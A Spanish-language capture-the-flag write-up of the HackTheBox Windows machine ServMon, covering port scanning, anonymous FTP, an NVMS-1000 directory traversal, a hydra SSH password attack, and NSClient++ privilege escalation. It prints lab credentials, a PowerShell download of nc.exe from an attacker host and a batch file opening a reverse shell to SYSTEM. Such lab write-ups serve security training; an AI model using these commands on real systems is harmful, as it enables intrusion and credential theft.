ServMon es una de las maquinas existentes actualmente en la plataforma de hacking HackTheBox y es de dificultad fácil.
En este caso se trata de una máquina basada en el Sistema Operativo Windows.
Escaneo de puertos
Como de costumbre, agregamos la IP de la máquina ServMon 10.10.10.184 a /etc/hosts como servmon.htb y comenzamos con el escaneo de puertos nmap.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 |
# Nmap 7.80 scan initiated Mon May 11 00:14:39 2020 as: nmap -sV -Pn -p- -sC -oA servmon-nmap2 10.10.10.184 Nmap scan report for 10.10.10.184 Host is up (0.080s latency). Not shown: 65517 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp Microsoft ftpd | ftp-anon: Anonymous FTP login allowed (FTP code 230) |_01-18-20 12:05PM <DIR> Users | ftp-syst: |_ SYST: Windows_NT 22/tcp open ssh OpenSSH for_Windows_7.7 (protocol 2.0) | ssh-hostkey: | 2048 b9:89:04:ae:b6:26:07:3f:61:89:75:cf:10:29:28:83 (RSA) | 256 71:4e:6c:c0:d3:6e:57:4f:06:b8:95:3d:c7:75:57:53 (ECDSA) |_ 256 15:38:bd:75:06:71:67:7a:01:17:9c:5c:ed:4c:de:0e (ED25519) 80/tcp open http | fingerprint-strings: | GetRequest, HTTPOptions, RTSPRequest: | HTTP/1.1 200 OK | Content-type: text/html | Content-Length: 340 | Connection: close | AuthInfo: | <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> | <html xmlns="http://www.w3.org/1999/xhtml"> | <head> | <title></title> | <script type="text/javascript"> | window.location.href = "Pages/login.htm"; | </script> | </head> | <body> | </body> | </html> | X11Probe: | HTTP/1.1 408 Request Timeout | Content-type: text/html | Content-Length: 0 | Connection: close |_ AuthInfo: |_http-title: Site doesn't have a title (text/html). |_http-trane-info: Problem with XML parsing of /evox/about 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds? 5040/tcp open unknown 5666/tcp open tcpwrapped 6063/tcp open tcpwrapped 6699/tcp open napster? 8443/tcp open ssl/https-alt | fingerprint-strings: | FourOhFourRequest, HTTPOptions, RTSPRequest, SIPOptions: | HTTP/1.1 404 | Content-Length: 18 | Document not found | GetRequest: | HTTP/1.1 302 | Content-Length: 0 | Location: /index.html | workers |_ jobs | http-title: NSClient++ |_Requested resource was /index.html | ssl-cert: Subject: commonName=localhost | Not valid before: 2020-01-14T13:24:20 |_Not valid after: 2021-01-13T13:24:20 |_ssl-date: TLS randomness does not represent time 49664/tcp open msrpc Microsoft Windows RPC 49665/tcp open msrpc Microsoft Windows RPC 49666/tcp open msrpc Microsoft Windows RPC 49667/tcp open msrpc Microsoft Windows RPC 49668/tcp open msrpc Microsoft Windows RPC 49669/tcp open msrpc Microsoft Windows RPC 49670/tcp open msrpc Microsoft Windows RPC 2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service : ==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)============== SF-Port80-TCP:V=7.80%I=7%D=5/11%Time=5EB880D8%P=x86_64-pc-linux-gnu%r(GetR SF:equest,1B4,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x20text/html\r\nCon SF:tent-Length:\x20340\r\nConnection:\x20close\r\nAuthInfo:\x20\r\n\r\n\xe SF:f\xbb\xbf<!DOCTYPE\x20html\x20PUBLIC\x20\"-//W3C//DTD\x20XHTML\x201\.0\ SF:x20Transitional//EN\"\x20\"http://www\.w3\.org/TR/xhtml1/DTD/xhtml1-tra SF:nsitional\.dtd\">\r\n\r\n<html\x20xmlns=\"http://www\.w3\.org/1999/xhtm SF:l\">\r\n<head>\r\n\x20\x20\x20\x20<title></title>\r\n\x20\x20\x20\x20<s SF:cript\x20type=\"text/javascript\">\r\n\x20\x20\x20\x20\x20\x20\x20\x20w SF:indow\.location\.href\x20=\x20\"Pages/login\.htm\";\r\n\x20\x20\x20\x20 SF:</script>\r\n</head>\r\n<body>\r\n</body>\r\n</html>\r\n")%r(HTTPOption SF:s,1B4,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x20text/html\r\nContent- SF:Length:\x20340\r\nConnection:\x20close\r\nAuthInfo:\x20\r\n\r\n\xef\xbb SF:\xbf<!DOCTYPE\x20html\x20PUBLIC\x20\"-//W3C//DTD\x20XHTML\x201\.0\x20Tr SF:ansitional//EN\"\x20\"http://www\.w3\.org/TR/xhtml1/DTD/xhtml1-transiti SF:onal\.dtd\">\r\n\r\n<html\x20xmlns=\"http://www\.w3\.org/1999/xhtml\">\ SF:r\n<head>\r\n\x20\x20\x20\x20<title></title>\r\n\x20\x20\x20\x20<script SF:\x20type=\"text/javascript\">\r\n\x20\x20\x20\x20\x20\x20\x20\x20window SF:\.location\.href\x20=\x20\"Pages/login\.htm\";\r\n\x20\x20\x20\x20</scr SF:ipt>\r\n</head>\r\n<body>\r\n</body>\r\n</html>\r\n")%r(RTSPRequest,1B4 SF:,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x20text/html\r\nContent-Lengt SF:h:\x20340\r\nConnection:\x20close\r\nAuthInfo:\x20\r\n\r\n\xef\xbb\xbf< SF:!DOCTYPE\x20html\x20PUBLIC\x20\"-//W3C//DTD\x20XHTML\x201\.0\x20Transit SF:ional//EN\"\x20\"http://www\.w3\.org/TR/xhtml1/DTD/xhtml1-transitional\ SF:.dtd\">\r\n\r\n<html\x20xmlns=\"http://www\.w3\.org/1999/xhtml\">\r\n<h SF:ead>\r\n\x20\x20\x20\x20<title></title>\r\n\x20\x20\x20\x20<script\x20t SF:ype=\"text/javascript\">\r\n\x20\x20\x20\x20\x20\x20\x20\x20window\.loc SF:ation\.href\x20=\x20\"Pages/login\.htm\";\r\n\x20\x20\x20\x20</script>\ SF:r\n</head>\r\n<body>\r\n</body>\r\n</html>\r\n")%r(X11Probe,6B,"HTTP/1\ SF:.1\x20408\x20Request\x20Timeout\r\nContent-type:\x20text/html\r\nConten SF:t-Length:\x200\r\nConnection:\x20close\r\nAuthInfo:\x20\r\n\r\n"); ==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)============== SF-Port8443-TCP:V=7.80%T=SSL%I=7%D=5/11%Time=5EB880DE%P=x86_64-pc-linux-gn SF:u%r(GetRequest,74,"HTTP/1\.1\x20302\r\nContent-Length:\x200\r\nLocation SF::\x20/index\.html\r\n\r\n\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 SF:\0\0\0\0\0\0\x12\x02\x18\0\x1aC\n\x07workers\x12\n\n\x04jobs\x12\x02\x1 SF:8h\x12\x0f")%r(HTTPOptions,36,"HTTP/1\.1\x20404\r\nContent-Length:\x201 SF:8\r\n\r\nDocument\x20not\x20found")%r(FourOhFourRequest,36,"HTTP/1\.1\x SF:20404\r\nContent-Length:\x2018\r\n\r\nDocument\x20not\x20found")%r(RTSP SF:Request,36,"HTTP/1\.1\x20404\r\nContent-Length:\x2018\r\n\r\nDocument\x SF:20not\x20found")%r(SIPOptions,36,"HTTP/1\.1\x20404\r\nContent-Length:\x SF:2018\r\n\r\nDocument\x20not\x20found"); Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: 3m32s | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2020-05-10T22:38:03 |_ start_date: N/A Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Mon May 11 00:34:56 2020 -- 1 IP address (1 host up) scanned in 1217.30 seconds |
Descubrimos varios servicios abiertos que pasamos a comprobar a continuación.
Enumerando
Comprobamos el primero de los servicios y verificamos el acceso a ftp como anonymous.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 |
$ ftp 10.10.10.184 Connected to 10.10.10.184. 220 Microsoft FTP Service Name (10.10.10.184:asdf): anonymous 331 Anonymous access allowed, send identity (e-mail name) as password. Password: 230 User logged in. Remote system type is Windows_NT. ftp> ls 200 PORT command successful. 125 Data connection already open; Transfer starting. 01-18-20 12:05PM <DIR> Users 226 Transfer complete. ftp> cd Users 250 CWD command successful. ftp> ls 200 PORT command successful. 150 Opening ASCII mode data connection. 01-18-20 12:06PM <DIR> Nadine 01-18-20 12:08PM <DIR> Nathan 226 Transfer complete. ftp> ls Nadine 200 PORT command successful. 150 Opening ASCII mode data connection. 01-18-20 12:08PM 174 Confidential.txt 226 Transfer complete. ftp> ls Nathan 200 PORT command successful. 125 Data connection already open; Transfer starting. 01-18-20 12:10PM 186 Notes to do.txt 226 Transfer complete. ftp> |
Y descubrimos dos usuarios, Nadine y Nathan y dos ficheros.
El fichero Confidential.txt
1 2 3 4 5 |
Nathan, I left your Passwords.txt file on your Desktop. Please remove this once you have edited it yourself and place it back into the secure folder. Regards |
Y el fichero Notes to do.txt
1 2 3 4 5 |
1) Change the password for NVMS - Complete 2) Lock down the NSClient Access - Complete 3) Upload the passwords 4) Remove public access to NVMS 5) Place the secret files in SharePoint |
Tenemos dos usuarios, pero ninguna credencial de acceso así que seguimos investigando.
Comprobaremos ahora el puerto 80, que nos lleva a un portal con el software NVMS-1000
Probamos con lo típico, admin:admin, pero sin éxito así que buscamos algún exploit al respecto en google y damos con una vulnerabilidad de Directory Traversal
Abrimos burpsuite, interceptamos la petición y verificamos si es vulnerable:
Vale, hemos comprobado que es vulnerable a este fallo, así que ayudándonos de lo mencionado en el fichero Confidential.txt tratamos de obtener las contraseñas:
Y conseguimos el fichero Passwords.txt de la home del usuario Nathan cuyo contenido es el siguiente:
1 2 3 4 5 6 7 |
1nsp3ctTh3Way2Mars! Th3r34r3To0M4nyTrait0r5! B3WithM30r4ga1n5tMe L1k3B1gBut7s@W0rk 0nly7h3y0unGWi11F0l10w IfH3s4b0Utg0t0H1sH0me Gr4etN3w5w17hMySk1Pa5$ |
Con las claves obtenidas, vamos a probar a loguearnos con los usuarios y claves por ssh. Utilizaremos hydra para hacer un ataque con diccionario:
1 2 3 4 5 6 7 8 9 10 |
$ hydra -L users.txt -P passwords.txt 10.10.10.184 ssh Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-05-11 11:07:02 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 [DATA] max 16 tasks per 1 server, overall 16 tasks, 16 login tries (l:2/p:8), ~1 try per task [DATA] attacking ssh://10.10.10.184:22/ [22][ssh] host: 10.10.10.184 login: Nadine password: L1k3B1gBut7s@W0rk 1 of 1 target successfully completed, 1 valid password found Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-05-11 11:07:05 |
Y tenemos un acceso por ssh con el user Nadine y la pass L1k3B1gBut7s@W0rk
Obteniendo la flag de user
Accedemos por ssh con las claves obtenidas, y tenemos la flag del usuario en la carpeta desktop del usuario:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 |
ssh Nadine@10.10.10.184 Nadine@10.10.10.184's password: Microsoft Windows [Version 10.0.18363.752] (c) 2019 Microsoft Corporation. All rights reserved. nadine@SERVMON C:\Users\Nadine>whoami servmon\nadine nadine@SERVMON C:\Users\Nadine>cd Desktop nadine@SERVMON C:\Users\Nadine\Desktop>dir Volume in drive C has no label. Volume Serial Number is 728C-D22C Directory of C:\Users\Nadine\Desktop 08/04/2020 22:28 <DIR> . 08/04/2020 22:28 <DIR> .. 11/05/2020 09:43 34 user.txt 1 File(s) 34 bytes 2 Dir(s) 27,860,647,936 bytes free nadine@SERVMON C:\Users\Nadine\Desktop> |
Escalando privilegios
Una vez tenemos el primer acceso, después de varias vueltas, revisamos el servicio existente en el puerto 8443.
Se trata de nsclient++, un agente utilizado en windows para la monitorización del sistema con nagios.
Buscamos en google y encontramos un exploit del mismo que podemos comprobar si es posible obtener información con la explicación que ofrece.
Así que nos vamos al fichero c:\program files\nsclient++\nsclient.ini cuyo contenido es el siguiente:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 |
# If you want to fill this file with all available options run the following command: # nscp settings --generate --add-defaults --load-all # If you want to activate a module and bring in all its options use: # nscp settings --activate-module <MODULE NAME> --add-defaults # For details run: nscp settings --help ; in flight - TODO [/settings/default] ; Undocumented key password = ew2x6SsGTxjRwXOT ; Undocumented key allowed hosts = 127.0.0.1 ; in flight - TODO [/settings/NRPE/server] ; Undocumented key ssl options = no-sslv2,no-sslv3 ; Undocumented key verify mode = peer-cert ; Undocumented key insecure = false ; in flight - TODO [/modules] ; Undocumented key CheckHelpers = disabled ; Undocumented key CheckEventLog = disabled ; Undocumented key CheckNSCP = disabled ; Undocumented key CheckDisk = disabled ; Undocumented key CheckSystem = disabled ; Undocumented key WEBServer = enabled ; Undocumented key NRPEServer = enabled ; CheckTaskSched - Check status of your scheduled jobs. CheckTaskSched = enabled ; Scheduler - Use this to schedule check commands and jobs in conjunction with for instance passive monitoring thr ough NSCA Scheduler = enabled ; CheckExternalScripts - Module used to execute external scripts CheckExternalScripts = enabled ; Script wrappings - A list of templates for defining script commands. Enter any command line here and they will b e expanded by scripts placed under the wrapped scripts section. %SCRIPT% will be replaced by the actual script an %ARGS% will be replaced by any given arguments. [/settings/external scripts/wrappings] ; Batch file - Command used for executing wrapped batch files bat = scripts\\%SCRIPT% %ARGS% ; Visual basic script - Command line used for wrapped vbs scripts vbs = cscript.exe //T:30 //NoLogo scripts\\lib\\wrapper.vbs %SCRIPT% %ARGS% ; POWERSHELL WRAPPING - Command line used for executing wrapped ps1 (powershell) scripts ps1 = cmd /c echo If (-Not (Test-Path "scripts\%SCRIPT%") ) { Write-Host "UNKNOWN: Script `"%SCRIPT%`" not found." ; exit(3) }; scripts\%SCRIPT% $ARGS$; exit($lastexitcode) | powershell.exe /noprofile -command - ; External scripts - A list of scripts available to run from the CheckExternalScripts module. Syntax is: `command= script arguments` [/settings/external scripts/scripts] ; Schedules - Section for the Scheduler module. [/settings/scheduler/schedules] ; Undocumented key foobar = command = foobar ; External script settings - General settings for the external scripts module (CheckExternalScripts). [/settings/external scripts] allow arguments = true |
Y vemos dos cosas importantes en el mismo, la contraseña y la dirección de acceso permitida:
1 2 3 4 |
; Undocumented key password = ew2x6SsGTxjRwXOT ; Undocumented key allowed hosts = 127.0.0.1 |
Así que creamos un tunel con ssh para acceder al portal con la dirección 127.0.0.1 o localhost:
1 |
ssh -L 9000:127.0.0.1:8443 nadine@10.10.10.184 |
Y conseguimos entrar al portal mediante la dirección https://127.0.0.1:9000 y loguearnos en el mismo con la password obtenida.
Ahora lo que haremos será subir el fichero nc.exe a la máquina para poder ejecutar una shell inversa y conectar como system.
1 2 |
powershell invoke-webrequest -Uri http://10.10.x.x:12312/nc.exe -OutFile nc.exe |
Y crearemos un fichero .bat que ejecutaremos posteriormente en la máquina:
1 2 |
@echo off C:\Temp\nc.exe -e cmd.exe 10.10.x.x 4444 |
Y lo subimos:
1 |
invoke-webrequest -Uri http://10.10.x.x:12312/shell.bat -OutFile shell.bat |
Posteriormente iremos a la sección de settings y crearemos nuestro script como vemos en la siguiente captura:
Y después crearemos una tarea programada que ejecute nuestro script:
Después pulsaremos en el botón de la barra superior Control > reload
Obteniendo la flag de root
Una vez recargamos, cuando pase el minuto que le hemos puesto de intervalo a la tarea programada, tendremos la shell como system:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 |
$ nc -nlvp 4444 listening on [any] 4444 ... connect to [10.10.x.x] from (UNKNOWN) [10.10.10.184] 50249 Microsoft Windows [Version 10.0.18363.752] (c) 2019 Microsoft Corporation. All rights reserved. C:\Program Files\NSClient++>whoami whoami nt authority\system C:\Program Files\NSClient++>cd c:\users\administrator\desktop cd c:\users\administrator\desktop C:\Users\Administrator\Desktop>dir dir Volume in drive C has no label. Volume Serial Number is 728C-D22C Directory of C:\Users\Administrator\Desktop 08/04/2020 23:12 <DIR> . 08/04/2020 23:12 <DIR> .. 11/05/2020 11:02 34 root.txt 1 File(s) 34 bytes 2 Dir(s) 27,823,443,968 bytes free C:\Users\Administrator\Desktop> |
Y ya tenemos nuestra flag de root para completar esta máquina y conseguir nuestros puntos.